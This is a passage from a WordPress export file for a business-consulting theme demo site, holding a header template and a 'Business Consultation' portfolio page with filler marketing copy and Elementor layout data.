	<li id="menu-item-763"><a href="http://wpdemo.archiwp.com/maxbizz/faqs/">FAQs</a></li>
	<li id="menu-item-758"><a href="http://wpdemo.archiwp.com/maxbizz/404-2/">404</a></li>
	<li id="menu-item-760"><a href="http://wpdemo.archiwp.com/maxbizz/coming-soon/">Coming Soon</a></li>
</ul>
</li>
<li id="menu-item-1041"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-grid/">Portfolio</a>
<ul>
	<li id="menu-item-1044"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-grid/">Portfolio Grid</a></li>
	<li id="menu-item-1042"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-masonry/">Portfolio Masonry</a></li>
	<li id="menu-item-1040"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-carousel/">Portfolio Carousel</a></li>
	<li id="menu-item-1149"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio/digital-marketing/">Portfolio Details</a></li>
</ul>
</li>
<li id="menu-item-1022"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/">Services</a>
<ul>
	<li id="menu-item-1020"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/">Marketing Research</a></li>
	<li id="menu-item-1019"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">Organizational Audit</a></li>
	<li id="menu-item-1018"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Business Consulting</a></li>
	<li id="menu-item-1017"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Project Management</a></li>
	<li id="menu-item-1016"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">Support Function</a></li>
	<li id="menu-item-1015"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">Finance Planning</a></li>
</ul>
</li>
<li id="menu-item-771"><a href="http://wpdemo.archiwp.com/maxbizz/blog/">Blog</a>
<ul>
	<li id="menu-item-1045"><a href="http://wpdemo.archiwp.com/maxbizz/blog/">Blog List</a></li>
	<li id="menu-item-1068"><a href="http://wpdemo.archiwp.com/maxbizz/the-future-of-retail-asias-ecosystems/">Blog Post</a></li>
</ul>
</li>
<li id="menu-item-761"><a href="http://wpdemo.archiwp.com/maxbizz/contacts/">Contacts</a></li>
</ul>			</nav>
				<!-- Form Search on Header -->
						<form role="search" method="get" action="http://wpdemo.archiwp.com/maxbizz/" >
    <label>Search for:
    <input type="search" placeholder="Search&hellip;" value="" name="s" /></label>
	<button type="submit"></button>
    </form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>267</wp:post_id>
		<wp:post_date><![CDATA[2020-07-24 08:06:39]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-07-24 08:06:39]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[header-5]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"6883fb1","elType":"section","settings":{"structure":"22","background_background":"classic","background_color":"#F5F5F5"},"elements":[{"id":"bae537d","elType":"column","settings":{"_column_size":33,"_inline_size":86.974999999999994315658113919198513031005859375,"content_position":"center"},"elements":[{"id":"e209fcf","elType":"widget","settings":{"editor":"<p>Maxbizz The Largest Business Expert in USA &amp; Europe. We Provide The Solutions to Grow Your Business.<\/p>","typography_typography":"custom","typography_font_size":{"unit":"px","size":14,"sizes":[]},"typography_font_weight":"600","text_color":"#5F5F5F"},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"3c6c353","elType":"column","settings":{"_column_size":66,"_inline_size":12.0069999999999996731503415503539144992828369140625,"align":"flex-end","_ot_column_min_width":{"unit":"px","size":165,"sizes":[]},"_ot_content_align":"horizontal"},"elements":[{"id":"856df84","elType":"widget","settings":{"text":"CONTACT US","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":13,"sizes":[]},"typography_font_weight":"500","background_color":"#52C5B6","button_background_hover_color":"#30344D","border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":true},"text_padding":{"unit":"px","top":"13","right":"28","bottom":"12","left":"28","isLinked":false}},"elements":[],"widgetType":"button"}],"isInner":false}],"isInner":false},{"id":"e4091a8","elType":"section","settings":{"content_position":"middle","structure":"20","padding":{"unit":"px","top":"16","right":"0","bottom":"16","left":"0","isLinked":false}},"elements":[{"id":"95b9eb7","elType":"column","settings":{"_column_size":50,"_inline_size":20},"elements":[{"id":"ac2109b","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/05_Black.svg","id":389},"logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"}],"isInner":false},{"id":"27b0423","elType":"column","settings":{"_column_size":50,"_inline_size":80,"_ot_content_align":"horizontal","align":"flex-end"},"elements":[{"id":"1f76ab2","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":0,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":1420},"library":"svg"},"title_color":"#5F5F5F","title_typography_font_family":"Open Sans","description_color":"#1B1D21","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"0","isLinked":false},"link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"icon-box"},{"id":"aec3252","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_size":{"unit":"px","size":24,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":0,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":1419},"library":"svg"},"title_color":"#5F5F5F","title_typography_font_family":"Open Sans","description_color":"#1B1D21","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"60","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"26188f4","elType":"widget","settings":{"title_text":"Our Working Hours","description_text":"Mon - Sat: 8.00 - 18.00","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":0,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/symbol.svg","id":356},"library":"svg"},"title_color":"#5F5F5F","title_typography_font_family":"Open Sans","description_color":"#1B1D21","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"60","isLinked":false}},"elements":[],"widgetType":"icon-box"}],"isInner":false}],"isInner":false},{"id":"df85639","elType":"section","settings":{"structure":"22","background_background":"classic","background_color":"#30344D","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"}},"elements":[{"id":"5ff3000","elType":"column","settings":{"_column_size":66,"_inline_size":null},"elements":[{"id":"f7bff2e","elType":"widget","settings":{"nav_menu":"main-menu","text_color":"#FFFFFF","text_hover_color":"#52C5B6","smenu_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":10,"spread":0,"color":""},"menu_typography_typography":"custom","menu_typography_font_weight":"500"},"elements":[],"widgetType":"imenu"}],"isInner":false},{"id":"42df45d","elType":"column","settings":{"_column_size":33,"_inline_size":null,"align":"flex-end","_ot_content_align":"horizontal"},"elements":[{"id":"94c7570","elType":"widget","settings":{"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"20","isLinked":false},"icon_color":"#FFFFFF","bg_btn":"#52C5B6"},"elements":[],"widgetType":"isearch"},{"id":"ea13c65","elType":"widget","settings":{"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"30","isLinked":false},"icon_color":"#FFFFFF"},"elements":[],"widgetType":"isidepanel"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:4:{s:21:"typography_typography";i:1;s:20:"typography_font_size";i:1;s:22:"typography_font_weight";i:1;s:10:"text_color";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:6;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:5:{s:12:"_inline_size";i:6;s:16:"content_position";i:1;s:5:"align";i:3;s:20:"_ot_column_min_width";i:1;s:17:"_ot_content_align";i:3;}}}}s:6:"button";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_button";a:1:{s:4:"text";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:10:{s:21:"typography_typography";i:1;s:22:"typography_font_family";i:1;s:20:"typography_font_size";i:1;s:22:"typography_font_weight";i:1;s:16:"background_color";i:1;s:29:"button_background_hover_color";i:1;s:12:"border_width";i:1;s:12:"border_color";i:1;s:13:"border_radius";i:1;s:12:"text_padding";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:17:"section_structure";a:1:{s:9:"structure";i:3;}s:14:"section_layout";a:1:{s:16:"content_position";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:2;s:16:"background_color";i:2;}s:14:"section_border";a:2:{s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:7:"padding";i:1;}}}}s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:8;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:1;}}s:5:"style";a:2:{s:18:"section_style_icon";a:3:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;}s:21:"section_style_content";a:12:{s:26:"content_vertical_alignment";i:3;s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:32:"description_typography_font_size";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:3;}}}}s:5:"imenu";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:1:{s:5:"style";a:2:{s:18:"style_menu_section";a:4:{s:10:"text_color";i:1;s:16:"text_hover_color";i:1;s:26:"menu_typography_typography";i:1;s:27:"menu_typography_font_weight";i:1;}s:19:"style_smenu_section";a:1:{s:23:"smenu_shadow_box_shadow";i:1;}}}}s:7:"isearch";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}s:5:"style";a:2:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}s:18:"style_form_section";a:1:{s:6:"bg_btn";i:1;}}}}s:10:"isidepanel";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Business Consultation</title>
		<link>http://wpdemo.archiwp.com/maxbizz/portfolio/business-consultation/</link>
		<pubDate>Fri, 11 Sep 2020 07:26:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=773</guid>
		<description></description>
		<content:encoded><![CDATA[Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.
<h6>Client:</h6>
BusinessMax
<h6>Website:</h6>
businessmax.com
<h6>Date:</h6>
November 22, 2020
<h6>Category:</h6>
Marketing/Finance

<img src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" sizes="(max-width: 1174px) 100vw, 1174px" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-768x406.jpg 768w" alt="" width="1174" height="620" />
<h5>01. Сhallenge</h5>
Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.
<ul>
 	<li>the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.</li>
 	<li>there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.</li>
</ul>
<h5>02. Solutions</h5>
What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.

75
<h6>marketing analysis</h6>
65
<h6>business innovation</h6>
90
<h6>finance strategy</h6>
45
<h6>corporate management</h6>
<h5>03. Results</h5>
A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.

We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.

<img src="https://maxbizz.s3.amazonaws.com/images/chart-project.png" sizes="(max-width: 606px) 100vw, 606px" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-300x169.png 300w" alt="" width="606" height="342" />
<a target="_blank" rel="noopener noreferrer">
Twitter
</a>
<a target="_blank" rel="noopener noreferrer">
Facebook-f
</a>
<a target="_blank" rel="noopener noreferrer">
Google-plus-g
</a>
<a target="_blank" rel="noopener noreferrer">
Pinterest-p
</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>773</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:26:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:26:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[business-consultation]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="business"><![CDATA[business]]></category>
		<category domain="portfolio_cat" nicename="finance"><![CDATA[finance]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.10]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"3eb71c6","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"40279fc","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"f75ccb2","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"3fdd108","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"31adc79","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"a1676c3","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"925bd17","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"98d8bcd","elType":"widget","settings":{"editor":"<p>BusinessMax<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"4516c47","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3b7b92a","elType":"widget","settings":{"editor":"<p>businessmax.com<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"c389ea2","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"86fc555","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2bed14d","elType":"widget","settings":{"editor":"<p>November 22, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"f07866b","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"14874f9","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"03b8867","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"47f5968","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"edf6855","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"d911fad","elType":"section","settings":[],"elements":[{"id":"3b9b9ec","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"9bae72f","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"ffde38b","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"38e21b9","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#FF8523","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"8632c90","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"9fbdbf2","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"4e7bf5c","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"ac13623","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"a6a4fe7","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"b446617","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"4fd130b","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"5658535","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"7afe30c","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"8f31e74","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"28ce8db","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"dc57d8f","elType":"widget","settings":{"bar_style":"circle","title":"corporate 